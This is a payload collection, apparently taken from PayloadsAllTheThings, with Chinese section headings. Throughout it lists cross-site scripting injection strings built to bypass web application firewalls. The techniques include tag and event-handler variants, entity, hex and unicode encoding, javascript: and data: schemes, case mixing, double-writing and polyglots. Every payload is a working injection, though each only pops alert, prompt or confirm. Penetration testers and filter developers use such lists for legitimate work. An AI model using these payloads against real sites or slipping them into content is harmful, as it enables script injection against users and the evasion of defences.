# XSS WAF Bypass Payloads
# 来源: PayloadsAllTheThings XSS Injection
# 大神级XSS WAF绕过payload集合

# === 基础绕过 ===
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script>
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

# === IMG标签绕过 ===
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<><img src=1 onerror=alert(1)>
<img src=1 onerror="alert(1)">
<img/src=x onerror=alert(1)>
<img	src=x	onerror=alert(1)>
<img
src=x
onerror=alert(1)>

# === SVG标签绕过 ===
<svgonload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) />
<svg><script>alert('33')
<svg><script>alert&lpar;'33'&rpar;

# === DIV标签绕过 ===
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>

# === HTML5标签绕过 ===
<body onload=alert(/XSS/.source)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">
<audio src onloadstart=alert(1)>
<marquee onstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto">

# === 编码绕过 ===
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
<IMG SRC=1 ONERROR=&#97;&#108;&#101;&#114;&#116;(1)>
<script>&#97;&#108;&#101;&#114;&#116;(1)</script>
<script>\x61\x6c\x65\x72\x74(1)</script>
<script>\u0061\u006c\u0065\u0072\u0074(1)</script>

# === javascript: 协议绕过 ===
javascript:prompt(1)
%26%23106%26%2397%26%23118%26%2397%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2358%26%2399%26%23111%26%23110%26%23102%26%23105%26%23114%26%23109%26%2340%26%2349%26%2341
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
\152\141\166\141\163\143\162\151\160\164\072alert(1)
java%0ascript:alert(1)
java%09script:alert(1)
java%0dscript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)

# === data: 协议绕过 ===
data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

# === 事件处理器绕过 ===
<img src=x onerror="alert(1)">
<img src=x onerror='alert(1)'>
<img src=x onerror=alert(1)>
<img src=x onerror=alert`1`>
<img src=x onerror=alert&lpar;1&rpar;>
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=al\u0065rt(1)>

# === 大小写混合绕过 ===
<ScRiPt>alert(1)</ScRiPt>
<sCrIpT>alert(1)</sCrIpT>
<SCRIPT>alert(1)</SCRIPT>
<ImG sRc=x OnErRoR=alert(1)>
<iMg SrC=x oNeRrOr=alert(1)>

# === 空格/换行绕过 ===
<img/src=x/onerror=alert(1)>
<img	src=x	onerror=alert(1)>
<img%0asrc=x%0aonerror=alert(1)>
<img%0dsrc=x%0donerror=alert(1)>
<img%09src=x%09onerror=alert(1)>
<script%20>alert(1)</script>
<script%0a>alert(1)</script>
<script%0d>alert(1)</script>

# === 注释绕过 ===
<script>/**/alert(1)/**/</script>
<script>/**/alert/**/(/XSS/)</script>
<img src=x onerror=/**/alert(1)>

# === 双写绕过 ===
<scrscriptipt>alert(1)</scrscriptipt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<img src=x ononerrorerror=alert(1)>

# === 特殊字符绕过 ===
<script>alert(1)//</script>
<script>alert(1)<!--</script>
<script>alert(1)%0a</script>
<script>alert(1)%0d</script>

# === DOM XSS ===
#"><img src=/ onerror=alert(2)>
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
</script><script>alert(1)</script>
</title><script>alert(1)</script>
</textarea><script>alert(1)</script>

# === JS上下文绕过 ===
-(confirm)(document.domain)//
; alert(1);//
'-alert(1)-'
"-alert(1)-"
\'-alert(1)//
\"-alert(1)//

# === Polyglot ===
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//
</script><svg onload=alert(1)>
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
</script><script>alert(1)</script>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
